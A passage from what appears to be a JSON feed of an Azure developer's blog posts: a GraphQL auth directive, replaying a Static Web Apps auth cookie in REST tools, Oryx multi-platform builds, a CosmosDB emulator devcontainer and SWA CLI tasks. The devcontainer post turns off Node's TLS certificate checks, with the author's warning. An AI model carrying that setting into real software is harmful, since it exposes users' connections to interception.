they are authenticated, we’ll return the original resolvers result.\nUsing the directive We’ve added the directive to our schema, created an implementation of what to do with that directive, all that’s left is to tell Apollo to use it.\nFor this, we’ll update the ApolloServer in our index.ts file:\n1 2 3 4 5 6 7 8 9 10 11 12 13 const server = new ApolloServer({ typeDefs, resolvers, context: ({ request }: { request: HttpRequest }) => { return { isAuthenticated: isAuthenticated(request), user: getUserInfo(request) }; }, schemaDirectives: { isAuthenticated: IsAuthenticatedDirective } }); The schemaDirectives property is where we’ll tell Apollo to use our directive. It’s a key/value pair, where the key is the directive name, and the value is the implementation.\nConclusion And we’re done! This is a pretty simple example of how we can add authentication to a GraphQL server using a custom directive that uses the authentication model of Static Web Apps.\nWe saw that using a custom directive allows us to mark up the schema, indicating, at a schema level, which fields and types require authentication, and then have the directive take care of the heavy lifting for us.\nYou can find the full sample application, including a React UI on my GitHub, and the deployed app is here, but remember, it’s an in-memory store so the data is highly transient.\nBonus - restricting data to the current user If we look at the Author type, there’s some fields available that we might want to restrict to just the current user, such as their email or ID. Let’s create an isSelf directive that can handle this for us.\n1 2 3 4 5 6 7 8 directive @isSelf on OBJECT | FIELD_DEFINITION type Author { id: ID! @isSelf userId: String! @isSelf name: String! email: String @isSelf } With this we’re saying that the Author.name field is available to anyone, but everything else about their profile is restricted to just them. Now we can implement that directive:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 import { UserInfo } from "@aaronpowell/static-web-apps-api-auth"; import { AuthenticationError, SchemaDirectiveVisitor } from "apollo-server-azure-functions"; import { GraphQLObjectType, defaultFieldResolver, GraphQLField } from "graphql"; import { Author } from "../generated"; import "./typeExtensions"; const isSelfResolver = ( field: GraphQLField<any, any>, objectType: GraphQLObjectType, resolve: typeof defaultFieldResolver ): typeof defaultFieldResolver => (...args) => { const selfRequired = field._isSelfRequired || objectType._isSelfRequired; if (!selfRequired) { return resolve.apply(this, args); } const context = args[2]; if (!context.isAuthenticated || !context.user) { throw new AuthenticationError( "Operation requires an authenticated user" ); } const author = args[0] as Author; const user: UserInfo = context.user; if (author.userId !== user.userId) { throw new AuthenticationError( "Cannot access data across user boundaries" ); } return resolve.apply(this, args); }; export class IsSelfDirective extends SchemaDirectiveVisitor { visitObject(type: GraphQLObjectType) { this.ensureFieldsWrapped(type); type._isSelfRequired = true; } visitFieldDefinition( field: GraphQLField<any, any>, details: { objectType: GraphQLObjectType; } ) { this.ensureFieldsWrapped(details.objectType); field._isSelfRequired = true; } ensureFieldsWrapped(objectType: GraphQLObjectType) { if (objectType._isSelfRequiredWrapped) { return; } objectType._isSelfRequiredWrapped = true; const fields = objectType.getFields(); for (const fieldName of Object.keys(fields)) { const field = fields[fieldName]; const { resolve = defaultFieldResolver } = field; field.resolve = isSelfResolver(field, objectType, resolve); } } } This directive does take an assumption on how it’s being used, as it assumes that the first argument to the resolve function is an Author type, meaning it’s trying to resolve the Author through a query or mutation return, but otherwise it works very similar to the isAuthenticated directive, it ensures someone is logged in, and if they are, it ensures that the current user is the Author requested, if not, it’ll raise an error.\n", "id": "2021-07-05-graphql-on-azure-part-7-server-side-authentication" }, { "title": "Calling Static Web Apps Authenticated API Endpoints", "url": "https://www.aaron-powell.com/posts/2021-07-02-calling-static-web-apps-authenticated-endpoints/", "date": "Fri, 02 Jul 2021 03:30:41 +0000", "tags": [ "javascript", "azure", "webdev" ], "description": "Authenticated SWA endpoints can be tricky to test, as you don't control the headers... until now!", "content": "Static Web Apps provides built in authentication and authorisation, as well as BYO options (like Auth0 or Okta) and this is all handled by the SWA platform.\nFor local development, we can use the cli tool that can simulate how an authenticated experience works for local dev, without the hassle of setting up custom OAuth endpoints or anything like that.\nThis all works together nicely to make it easy to build authenticated experiences, test them locally and then deploy to Azure.\nThe problem While working on some content for an upcoming post, I hit a problem. I was building an authenticated experience and I wanted to test calling the API, but didn’t want to have to click through all the screens that would get me to that point. I just wanted to use something like REST Client for VS Code (or Postman, Insomniac, Fiddler, etc.) to call a specific API endpoint in an authenticated manner.\nBut since we go via the cli, or in production, the SWA proxy (I’m not sure it’s really a proxy server, but that’s what I call the thing that sits in front of your web and API endpoints to handle routing/auth/etc.), and not directly to the API, it poses a problem… how does auth happen?. It’s just taken care of by the platform, headers are injected, auth tokens are created, and as a user, you don’t need to think about it.\nHow SWA tracks auth It’s time to get under the hood of Static Web Apps and try and work out how we can tell it that this inbound request from REST Client is authenticated and to pass the user information to the Functions backend.\nSince we don’t have access to the Static Web Apps source code, we’ll have to dig around in the cli, although it’s not the same, it’s doing something to set the right headers.\nThe cli works by intercepting the requests that come in and sending them to either the web app, API or its built in mock auth server, and for the API, that happens here with the thing we’re specifically looking for that sets the headers happening in this callback. This calls the injectClientPrincipalCookies method and now we’re starting to get somewhere.\nWhat it’s doing is looking for a specific cookie, named StaticWebAppsAuthCookie, which becomes the header that you unpack in the API to get the user info (or use my nifty JavaScript library).\nSimulating auth from REST tools We now know the value that is expected by the cli to pass to the API, and it’s something that we can get by opening the web app and going through an auth flow, then open up the browser dev tools and go to the Application tab -> Cookies:\nCopy the cookie value, and it’s time to use your favourite REST tool, I’ll be using REST Client for VS Code and for the app I’m using my Auth0 SWA sample.\nLet’s create an initial API call:\n### Local GET http://localhost:4280/api/get-message Now, if you click the Send Request option above the request name it’ll give you back a response in a new tab:\nHTTP/1.1 200 OK connection: close date: Fri, 02 Jul 2021 05:42:49 GMT content-type: text/plain; charset=utf-8 server: Kestrel transfer-encoding: chunked This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response. There is no logged in user Nice! Our API is working, next up is to add the cookie to the request. With REST Client, we do that by adding a Cookie header, and custom headers are added to a request as subsequent lines from the one containing the HTTP request:\n## Local GET http://localhost:4280/api/get-message Cookie: StaticWebAppsAuthCookie=<your cookie value here> I’m logged in with a mock user that has the userDetail value being test_user@auth0.com, so the response is:\nHTTP/1.1 200 OK connection: close date: Fri, 02 Jul 2021 05:45:16 GMT content-type: text/plain; charset=utf-8 server: Kestrel transfer-encoding: chunked This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response. The user is test_user@auth0.com 🎉 We are making an authenticated requests from an external tool to SWA.\nIt you want to do this against a deployed SWA app, it’s the same process, although the cookie is a lot bigger (I assume it’s doing some better security than the cli 🤣) and I take no responsibility for it breaking down the track, as I don’t know how the cookie is really used!\nConclusion Static Web Apps authentication is great for adding security to an API, but it does become a little more challenging when we want to call that API from tools that we’re commonly using for API testing.\nThankfully, we’re able to simulate this by injecting a cookie to our requests that will “trick” the cli (and Azure) into thinking it was an authenticated request, passing the right user information down to the API.\nJust be aware - trying to poke too much at security against the Azure resource is probably not the best idea, but then again, we don’t to dev against production do we… 😉\n", "id": "2021-07-02-calling-static-web-apps-authenticated-endpoints" }, { "title": "Blazor, TypeScript and Static Web Apps", "url": "https://www.aaron-powell.com/posts/2021-06-24-blazor-typescript-and-static-web-apps/", "date": "Thu, 24 Jun 2021 00:30:52 +0000", "tags": [ "javascript", "webdev", "dotnet" ], "description": "Let's look at how we can solve the deployment when using Blazor and TypeScript in a single SWA project", "content": "While Blazor can most things that you need in a web application, there’s always a chance that you’ll end up having to leverage the JavaScript interop feature, either to call JavaScript from the .NET code or something in .NET from JavaScript.\nI was recently asked about how we can handle this better with Static Web Apps (SWA), especially in the case when you’re using TypeScript.\nLet’s talk about the problem and how to solve it.\nThe problem The problem that we hit when using TypeScript and Blazor together is how SWA’s build pipeline works. We consume the build and deploy process using a GitHub Action (or Azure Pipelines task) like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 jobs: build_and_deploy_job: if: github.event_name == 'push' || (github.event_name == 'pull_request' && github.event.action != 'closed') runs-on: ubuntu-latest name: Build and Deploy Job steps: - uses: actions/checkout@v2 with: submodules: true - name: Build And Deploy id: builddeploy uses: Azure/static-web-apps-deploy@v1 with: azure_static_web_apps_api_token: ${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_GENTLE_SEA_0D5D75010 }} repo_token: ${{ secrets.GITHUB_TOKEN }} # Used for Github integrations (i.e. PR comments) action: "upload" ###### Repository/Build Configurations - These values can be configured to match your app requirements. ###### # For more information regarding Static Web App workflow configurations, please visit: https://aka.ms/swaworkflowconfig app_location: "Client" # App source code path api_location: "Api" # Api source code path - optional output_location: "wwwroot" # Built app content directory - optional ###### End of Repository/Build Configurations ###### This job is a wrapper around the Oryx build engine, and this is what does the heavy lifting in terms of building the app ready for deployment to Azure.\nOryx works by looking at the folder to build and finding specific files, like a csproj or project.json, to work out what runtime/SDK is needed to build the app. In this hypothetical case of a Blazor + TypeScript application, we’ll have both of those files and this causes some confusion for Oryx, what should it build?\nLet’s take a look at a build log:\n---Oryx build logs--- Operation performed by Microsoft Oryx, https://github.com/Microsoft/Oryx You can report issues at https://github.com/Microsoft/Oryx/issues Oryx Version: 0.2.20210410.1, Commit: e73613ae1fd73c809c00f357f8df91eb984e1158, ReleaseTagName: 20210410.1 Build Operation ID: |A51vi7/GHfw=.702339dd_ Repository Commit : 9d372641619c66a1251375ce5fcd5ed11399fa49 Detecting platforms... Detected following platforms: nodejs: 14.15.1 dotnet: 3.1.13 Version '14.15.1' of platform 'nodejs' is not installed. Generating script to install it... Version '3.1.13' of platform 'dotnet' is not installed. Generating script to install it... Source directory : /github/workspace/Client Destination directory: /bin/staticsites/ss-oryx/app Downloading and extracting 'nodejs' version '14.15.1' to '/tmp/oryx/platforms/nodejs/14.15.1'... Downloaded in 0 sec(s). Verifying checksum... Extracting contents... Done in 2 sec(s). Downloading and extracting 'dotnet' version '3.1.407' to '/tmp/oryx/platforms/dotnet/3.1.407'... Downloaded in 2 sec(s). Verifying checksum... Extracting contents... Done in 5 sec(s). Using Node version: v14.15.1 Using Npm version: 6.14.8 Running 'npm install --unsafe-perm'... npm notice created a lockfile as package-lock.json. You should commit this file. npm WARN Client@1.0.0 No description npm WARN Client@1.0.0 No repository field. up to date in 0.232s found 0 vulnerabilities Running 'npm run build'... > Client@1.0.0 build /github/workspace/Client > tsc Preparing output... Copying files to destination directory '/bin/staticsites/ss-oryx/app'... Done in 0 sec(s). Removing existing manifest file Creating a manifest file... Manifest file created. Done in 9 sec(s). ---End of Oryx build logs--- Excellent, we’ve detected that there is both nodejs and dotnet needed, but if we look at it a bit further, we’ll see that it only ran npm run build, it didn’t run a dotnet publish, which we need to get the Blazor artifacts.\nAnd here is the problem, Oryx only builds a single platform, meaning our application can’t be deployed.\nThe solution Oryx knows about the two different platforms required and has gone ahead and installed them, but it doesn’t know that we want to do a multi-platform build.\nThankfully, this is something that we can solve using Oryx’s configuration, specifically ENABLE_MULTIPLATFORM_BUILD. All we need to do is add this to the env of the SWA job and we’re off and running:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 jobs: build_and_deploy_job: if: github.event_name == 'push' || (github.event_name == 'pull_request' && github.event.action != 'closed') runs-on: ubuntu-latest name: Build and Deploy Job steps: - uses: actions/checkout@v2 with: submodules: true - name: Build And Deploy id: builddeploy uses: Azure/static-web-apps-deploy@v1 env: ENABLE_MULTIPLATFORM_BUILD: true with: azure_static_web_apps_api_token: ${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_GENTLE_SEA_0D5D75010 }} repo_token: ${{ secrets.GITHUB_TOKEN }} # Used for Github integrations (i.e. PR comments) action: "upload" ###### Repository/Build Configurations - These values can be configured to match your app requirements. ###### # For more information regarding Static Web App workflow configurations, please visit: https://aka.ms/swaworkflowconfig app_location: "Client" # App source code path api_location: "Api" # Api source code path - optional output_location: "wwwroot" # Built app content directory - optional ###### End of Repository/Build Configurations ###### Now, when the job runs, it’ll build as many platforms as it finds!\n---Oryx build logs--- Operation performed by Microsoft Oryx, https://github.com/Microsoft/Oryx You can report issues at https://github.com/Microsoft/Oryx/issues Oryx Version: 0.2.20210410.1, Commit: e73613ae1fd73c809c00f357f8df91eb984e1158, ReleaseTagName: 20210410.1 Build Operation ID: |aGA1C0DlxfI=.73b3d0f3_ Repository Commit : 9cbf3cd5964436820377935e5ba176f72bbcda11 Detecting platforms... Detected following platforms: nodejs: 14.15.1 dotnet: 3.1.15 Version '14.15.1' of platform 'nodejs' is not installed. Generating script to install it... Version '3.1.15' of platform 'dotnet' is not installed. Generating script to install it... Source directory : /github/workspace/Client Destination directory: /bin/staticsites/ss-oryx/app Downloading and extracting 'nodejs' version '14.15.1' to '/tmp/oryx/platforms/nodejs/14.15.1'... Downloaded in 1 sec(s). Verifying checksum... Extracting contents... Done in 2 sec(s). Downloading and extracting 'dotnet' version '3.1.409' to '/tmp/oryx/platforms/dotnet/3.1.409'... Downloaded in 1 sec(s). Verifying checksum... Extracting contents... Done in 4 sec(s). Using Node version: v14.15.1 Using Npm version: 6.14.8 Running 'npm install --unsafe-perm'... npm notice created a lockfile as package-lock.json. You should commit this file. npm WARN Client@1.0.0 No description npm WARN Client@1.0.0 No repository field. up to date in 0.231s found 0 vulnerabilities Running 'npm run build'... > Client@1.0.0 build /github/workspace/Client > tsc Using .NET Core SDK Version: 3.1.409 Welcome to .NET Core 3.1! --------------------- SDK Version: 3.1.409 Telemetry --------- The .NET Core tools collect usage data in order to help us improve your experience. It is collected by Microsoft and shared with the community. You can opt-out of telemetry by setting the DOTNET_CLI_TELEMETRY_OPTOUT environment variable to '1' or 'true' using your favorite shell. Read more about .NET Core CLI Tools telemetry: https://aka.ms/dotnet-cli-telemetry ---------------- Explore documentation: https://aka.ms/dotnet-docs Report issues and find source on GitHub: https://github.com/dotnet/core Find out what's new: https://aka.ms/dotnet-whats-new Learn about the installed HTTPS developer cert: https://aka.ms/aspnet-core-https Use 'dotnet --help' to see available commands or visit: https://aka.ms/dotnet-cli-docs Write your first app: https://aka.ms/first-net-core-app -------------------------------------------------------------------------------------- Determining projects to restore... Restored /github/workspace/Shared/Shared.csproj (in 817 ms). Restored /github/workspace/Client/Client.csproj (in 1.58 sec). Publishing to directory /bin/staticsites/ss-oryx/app... Microsoft (R) Build Engine version 16.7.2+b60ddb6f4 for .NET Copyright (C) Microsoft Corporation. All rights reserved. Determining projects to restore... All projects are up-to-date for restore. Shared -> /github/workspace/Shared/bin/Release/netstandard2.0/Shared.dll Client -> /github/workspace/Client/bin/Release/netstandard2.1/Client.dll Client (Blazor output) -> /github/workspace/Client/bin/Release/netstandard2.1/wwwroot Client -> /bin/staticsites/ss-oryx/app/ Preparing output... Removing existing manifest file Creating a manifest file... Manifest file created. Done in 29 sec(s). ---End of Oryx build logs--- You’ll now see in the build output that we did our TypeScript compile step, followed by the appropriate dotnet steps.\nConclusion With Static Web Apps being generally available we’re seeing people tackling more complex scenarios, and this can lead to using multiple platforms together in the same project. By default the SWA build job won’t build all platforms, but by setting ENABLE_MULTIPLATFORM_BUILD to true on it, we can solve those problems.\n", "id": "2021-06-24-blazor-typescript-and-static-web-apps" }, { "title": "Supercharging a Web Devs Toolbox", "url": "https://www.aaron-powell.com/posts/2021-06-03-supercharging-a-web-devs-toolbox/", "date": "Thu, 03 Jun 2021 00:17:53 +0000", "tags": [ "javascript", "webdev", "vscode" ], "description": "There's so many awesome new tools to make web dev easier, let's check some of them out.", "content": "I recently gave a talk at the Microsoft Reactor showing off a bunch of tools that I think are super powerful when doing web development that some folks might not know of.\nYou can catch the recording on YouTube.\n", "id": "2021-06-03-supercharging-a-web-devs-toolbox" }, { "title": "Local Dev With CosmosDB and devcontainers", "url": "https://www.aaron-powell.com/posts/2021-05-27-local-dev-with-cosmosdb-and-devcontainers/", "date": "Thu, 27 May 2021 03:42:47 +0000", "tags": [ "javascript", "vscode", "cosmosdb" ], "description": "I'm mad about devcontainers, so let's take it to the limits!", "content": "When I was a consultant the nirvana that I tried to achieve on projects was to be able to clone them from source control and have everything ready to go, no wiki pages to follow on what tools to install, no unmaintained setup scripts, just clone + install dependencies. This is why I love VS Code Remote Containers, aka devcontainers.\nI’ve previously said all projects need devcontainers, that they are an essential tool for workshops and might go overboard on it locally…\nI'm a huge fan of @code devcontainers, but maybe I'm going overboard... 🤣 pic.twitter.com/szarhTFDgN\n— Aaron Powell (@slace) May 10, 2021 Yes, I really had 23 devcontainers on my machine. These days I don’t do any development on my machine, it all happens inside a container.\nThis works well for dev, I can run the web servers/APIs/etc. just fine, but there’s one piece that is more difficult… storage. Since I’m commonly using CosmosDB as the backend, I end up having a CosmosDB instance deployed to work against. While this is fine for me, if I’m creating a repo for others to use or a workshop to follow along with, there’s a hard requirement on deploying a CosmosDB service, which adds overhead to getting started.\nFor a while there has been a CosmosDB emulator, but it’s a Windows emulator and that still means a series of steps to install it beyond what can be in the Git repo, and I hadn’t had any luck connecting to it from a devcontainer.\nThings changed this week with Microsoft Build, a preview of a Linux emulator was released. Naturally I had to take it for a spin.\nSetting up the emulator The emulator is available as a Docker image, which means it’s pretty easy to setup, just pull the image:\n1 $> docker pull mcr.microsoft.com/cosmosdb/linux/azure-cosmos-emulator And then start a container:\n1 docker run -p 8081:8081 -p 10251:10251 -p 10252:10252 -p 10253:10253 -p 10254:10254 --name=cosmos -it mcr.microsoft.com/cosmosdb/linux/azure-cosmos-emulator This runs it locally, which is all well and good, but I want to use it with VS Code and devcontainers.\nCosmos devcontainers A devcontainer is, as the name suggests, where you do your development, and since we need to development against CosmosDB it could make sense to use the emulator image as the base image and then add all the other stuff we need, like Node, dotnet, etc.\nWhile this is a viable option, I feel like it’s probably not the simplest way. First off, you have a mega container that will be running, and if you want to change anything about the dev environment, you’ll end up trashing everything, including any data you might have. Also, the emulator image is pretty slimmed down, it doesn’t have runtimes like Node or dotnet installed, so you’ll need to add the appropriate apt sources, install the runtimes, etc. Very doable, but I think that’s not the best way to tackle.\nEnter Docker Compose.\nI only recently learnt that devcontainers support Docker Compose, meaning you can create a more complex environment stack and have VS Code start it all up for you.\nLet’s take the Node.js quickstart (full docs here) and run it in a devcontainer.\nOur devcontainer Dockerfile We’ll park the CosmosDB emulator for a moment and look at the Dockerfile we’ll need for this codebase.\nFollow the VS Code docs to scaffold up the devcontainer definition and let’s start hacking.\nNote: You may need to select “Show All Definitions” to get to the Docker Compose option, also, it’ll detect you’ve added the .devcontainer folder and prompt to open it in a container, but we’ll hold off for now until we set everything up.\nThe app is a Node.js app so we probably want to use that as our base image. Start by changing the base image to the Node.js image:\n1 2 ARG VARIANT="16-buster" FROM mcr.microsoft.com/vscode/devcontainers/javascript-node:0-${VARIANT} We’ll want to ensure we have the right version of Node installed, so we’ll allow the flexibility of passing that in as a container argument, but default to 16 as the Node.js version.\nSetting up Docker Compose Our Dockerfile is ready for the devcontainer, and we can run it just fine, but we want it to be part of a composed environment, so it’s time to finish off the Docker Compose file.\nThe one that was scaffolded up for us already has what we need for the app, all that we need to do is add the CosmosDB emulator as a service.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 version: "3" services: cosmos: image: mcr.microsoft.com/cosmosdb/linux/azure-cosmos-emulator:latest mem_limit: 3g cpu_count: 2 environment: AZURE_COSMOS_EMULATOR_PARTITION_COUNT: 10 AZURE_COSMOS_EMULATOR_ENABLE_DATA_PERSISTENCE: "true" volumes: # Forwards the local Docker socket to the container. - /var/run/docker.sock:/var/run/docker-host.sock app: # snip We’ve added a new service called cosmos (obvious huh!) that uses the image for the emulator and passes in the environment variables to control startup. We’ll also mount the Docker socket, just in case we need it later on.\nThere’s one final thing we need to configure before we open in the container, and that is to expose the CosmosDB emulator via the devcontainer port mapping. Now, it’s true we can do port mapping with the Docker Compose file, if you are running this environment via VS Code it does some hijacking of the port mapping, so we expose ports in the devcontainer.json file, not the docker-compose.yml file (this is more important if you’re using it with Codespaces as well, since then you don’t have access to the Docker host). But if we add the port forwarding in the devcontainer.json it won’t know that we want to expose a port from our cosmos service, as that’s not the main container for VS Code. Instead, we need to map the service into our app’s network with network_mode: service:cosmos:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 services: cosmos: # snip app: build: context: . dockerfile: Dockerfile.compose args: USER_UID: 1000 USER_GID: 1000 VARIANT: 16 init: true volumes: - /var/run/docker.sock:/var/run/docker-host.sock - ..:/workspace:cached entrypoint: /usr/local/share/docker-init.sh command: sleep infinity network_mode: service:cosmos Tweaking the devcontainer.json Our environment is ready to go, but if you were to launch it, the devcontainer won’t start because of the following error:\n[2209 ms] Start: Run in container: uname -m [2309 ms] Start: Run in container: cat /etc/passwd [2309 ms] Stdin closed! [2312 ms] Shell server terminated (code: 126, signal: null) unable to find user vscode: no matching entries in passwd file The problem here is that the base Docker image we’re using has created a user to run everything as named node, but the devcontainer.json file specifies the remoteUser as vscode:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 // For format details, see https://aka.ms/devcontainer.json. For config options, see the README at: // https://github.com/microsoft/vscode-dev-containers/tree/v0.179.0/containers/docker-from-docker-compose { "name": "Docker from Docker Compose", "dockerComposeFile": "docker-compose.yml", "service": "app", "workspaceFolder": "/workspace", // Use this environment variable if you need to bind mount your local source code into a new container. "remoteEnv": { "LOCAL_WORKSPACE_FOLDER": "${localWorkspaceFolder}" }, // Set *default* container specific settings.json values on container create. "settings": { "terminal.integrated.shell.linux": "/bin/bash" }, // Add the IDs of extensions you want installed when the container is created. "extensions": ["ms-azuretools.vscode-docker"], // Use 'forwardPorts' to make a list of ports inside the container available locally. // "forwardPorts": [], // Use 'postCreateCommand' to run commands after the container is created. // "postCreateCommand": "docker --version", // Comment out connect as root instead. More info: https://aka.ms/vscode-remote/containers/non-root. "remoteUser": "vscode" } We can change the remoteUser to node and everything is ready to go. But while we’re in the devcontainer.json file, let’s add some more extensions:\n1 2 3 4 5 6 "extensions": [ "ms-azuretools.vscode-docker", "dbaeumer.vscode-eslint", "esbenp.prettier-vscode", "ms-azuretools.vscode-cosmosdb" ], This will give us eslint + prettier (my preferred linter and formatter), as well as the CosmosDB tools for VS Code. I also like to add npm install as the postCreateCommand, so all the npm packages are installed before I start to use the container.\nConnecting to the CosmosDB emulator The emulator is running in a separate container to our workspace, you can see that with docker ps on your host:\n➜ docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES a883d9a21499 azure-cosmos-db-sql-api-nodejs-getting-started_devcontainer_app "/usr/local/share/do…" 4 minutes ago Up 4 minutes azure-cosmos-db-sql-api-nodejs-getting-started_devcontainer_app_1 c03a7a625470 mcr.microsoft.com/cosmosdb/linux/azure-cosmos-emulator:latest "/usr/local/bin/cosm…" 20 minutes ago Up 4 minutes azure-cosmos-db-sql-api-nodejs-getting-started_devcontainer_cosmos_1 So how do we address it from our app? either using its hostname or its IP address. I prefer to use the hostname, which is the name of the service in our docker-compose.yml file, so cosmos and it’s running on port 8081. For the Account Key, we get a standard one that you’ll find in the docs.\nOpen config.js and fill in the details:\n1 2 3 4 5 6 7 8 9 10 11 12 // @ts-check const config = { endpoint: "https://cosmos:8081/", key: "C2y6yDjf5/R+ob0N8A7Cgv30VRDJIWEHLM+4QDU5DE2nQ9nDuVTqobD4b8mGGyPMbIZnqyMsEcaGQy67XIw/Jw==", databaseId: "Tasks", containerId: "Items", partitionKey: { kind: "Hash", paths: ["/category"] } }; module.exports = config; Now open the terminal and run node app.js to run the app against the emulator.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 node ➜ /workspace (main ✗) $ node app.js /workspace/node_modules/node-fetch/lib/index.js:1455 reject(new FetchError(`request to ${request.url} failed, reason: ${err.message}`, 'system', err)); ^ FetchError: request to https://cosmos:8081/ failed, reason: self signed certificate at ClientRequest.<anonymous> (/workspace/node_modules/node-fetch/lib/index.js:1455:11) at ClientRequest.emit (node:events:365:28) at TLSSocket.socketErrorListener (node:_http_client:447:9) at TLSSocket.emit (node:events:365:28) at emitErrorNT (node:internal/streams/destroy:193:8) at emitErrorCloseNT (node:internal/streams/destroy:158:3) at processTicksAndRejections (node:internal/process/task_queues:83:21) { type: 'system', errno: 'DEPTH_ZERO_SELF_SIGNED_CERT', code: 'DEPTH_ZERO_SELF_SIGNED_CERT', headers: { 'x-ms-throttle-retry-count': 0, 'x-ms-throttle-retry-wait-time-ms': 0 } } Oh, it went 💥. That’s not what we wanted…\nIt turns out that we’re missing something. Node.js uses a defined list of TLS certificates, and doesn’t support self-signed certificates. The CosmosDB SDK handles this for localhost, which is how the emulator is designed to be used, but we’re not able to access it on localhost (unless maybe if you named the service that in the compose file, but that’s probably a bad idea…), so we have to work around this by disabling TLS.\nNote: Disabling TLS is not really a good idea, but it’s the only workaround we’ve got. Just don’t disable it on any production deployments!\nOpen the devcontainer.json file, as we can use this to inject environment variables into the container when it starts up, using the remoteEnv section:\n1 2 3 4 "remoteEnv": { "LOCAL_WORKSPACE_FOLDER": "${localWorkspaceFolder}", "NODE_TLS_REJECT_UNAUTHORIZED": "0" }, We’ll set NODE_TLS_REJECT_UNAUTHORIZED to 0, which will tell Node.js to ignore TLS errors. This will result in a warning on the terminal when the app runs, just a reminder that you shouldn’t do this in production!\nNow the environment needs to be recreated, reload VS Code and it’ll detect the changes to the devcontainer.json file and ask if you want to rebuild the environment. Click Rebuild and in a few moments your environments will be created (a lot quicker this time as the images already exist!), and you can open the terminal to run the app again:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 node ➜ /workspace (main ✗) $ node app.js (node:816) Warning: Setting the NODE_TLS_REJECT_UNAUTHORIZED environment variable to '0' makes TLS connections and HTTPS requests insecure by disabling certificate verification. (Use `node --trace-warnings ...` to show where the warning was created) Created database: Tasks Created container: Items Querying container: Items Created new item: 3 - Complete Cosmos DB Node.js Quickstart ⚡ Updated item: 3 - Complete Cosmos DB Node.js Quickstart ⚡ Updated isComplete to true Deleted item with id: 3 🎉 Tada! the sample is running against the CosmosDB emulator within a Docker container, being called from another Docker container.\nConclusion Throughout this post we’ve seen how we can create a complex environment with VS Code Remote Containers (aka, devcontainers), which uses the CosmosDB emulator to do local dev of a Node.js app against CosmosDB.\nYou’ll find my sample on GitHub, should you want to spin it.\nAlternative solution After posting this article I got into a Twitter discussion in which it looks like there might be another solution to this that doesn’t require disabling TLS. Noel Bundick has an example repo that uses the NODE_EXTRA_CA_CERTS environment variable to add the cert that comes with the emulator to Node.js at runtime, rather than disabling TLS. It’s a bit more clunky as you’ll need to run a few more steps once the devcontainer starts, but do check it out as an option.\n", "id": "2021-05-27-local-dev-with-cosmosdb-and-devcontainers" }, { "title": "Leveling Up Static Web Apps With the CLI", "url": "https://www.aaron-powell.com/posts/2021-05-25-leveling-up-static-web-apps-with-the-cli/", "date": "Tue, 25 May 2021 05:32:36 +0000", "tags": [ "javascript", "serverless", "vscode" ], "description": "Let's check out the Azure Static Web Apps CLI and how to use it with VS Code", "content": "With the Azure Static Web Apps GA there was a sneaky little project that my colleague Wassim Chegham dropped, the Static Web Apps CLI.\nThe SWA CLI is a tool he’s been building for a while with the aim to make it easier to do local development, especially if you want to do an authenticated experience. I’ve been helping out on making sure it works on Windows and for Blazor/.NET apps.\nIt works by running as a proxy server in front of the web and API components, giving you a single endpoint that you access the site via, much like when it’s deployed to Azure. It also will inject a mock auth token if want to create an authenticated experience, and enforce the routing rules that are defined in the staticwebapp.config.json file. By default, it’ll want to serve static content from a folder, but my preference is to proxy the dev server from create-react-app, so I can get hot reloading and stuff working. Let’s take a look at how we can do that.\nUsing the cli with VS Code With VS Code being my editor of choice, I wanted to work out the best way to work with it and the SWA CLI, so I can run a task and have it started. But as I prefer to use it as a proxy, this really requires me to run three tasks, one of the web app, one for the API and one for the CLI.\nSo, let’s start creating a tasks.json file:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 { "version": "2.0.0", "tasks": [ { "type": "npm", "script": "start", "label": "npm: start", "detail": "react-scripts start", "isBackground": true }, { "type": "npm", "script": "start", "path": "api/", "label": "npm: start - api", "detail": "npm-run-all --parallel start:host watch", "isBackground": true }, { "type": "shell", "command": "swa start http://localhost:3000 --api http://localhost:7071", "dependsOn": ["npm: start", "npm: start - api"], "label": "swa start", "problemMatcher": [], "dependsOrder": "parallel" } ] } The first two tasks will run npm start against the respective parts of the app, and you can see from the detail field what they are running. Both of these will run in the background of the shell (don’t need it to pop up to the foreground) but there’s a catch, they are running persistent commands, commands that don’t end and this has a problem.\nWhen we want to run swa start, it’ll kick off the two other tasks but using dependent tasks in VS Code means it will wait until the task(s) in the dependsOn are completed. Now, this is fine if you run a task that has an end (like tsc), but if you’ve got a watch going (tsc -w), well, it’s not ending and the parent task can’t start.\nUnblocking blocking processes We need to run two blocking processes but trick VS Code into thinking they are completed so we can run the CLI. It turns out we can do that by customising the problemMatcher part of our task with a background section. The important part here is defining some endPattern regex’s. Let’s start with the web app, which in this case is going to be using create-react-app, and the last message it prints once the server is up and running is:\nTo create a production build, use npm run build.\nGreat, we’ll look for that in the output, and if it’s found, treat it as the command is done.\nThe API is a little trickier though, as it’s running two commands, func start and tsc -w, and it’s doing that in parallel, making our output stream a bit messy. We’re mostly interested on when the Azure Functions have started up, and if we look at the output the easiest message to regex is probably:\nFor detailed output, run func with –verbose flag.\nIt’s not the last thing that’s output, but it’s close to and appears after the Functions are running, so that’ll do.\nNow that we know what to look for, let’s configure the problem matcher.\nUpdating our problem matchers To do what we need to do we’re going to need to add a problemMatcher section to the task and it’ll need to implement a full problemMatcher. Here’s the updated task for the web app:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 { "type": "npm", "script": 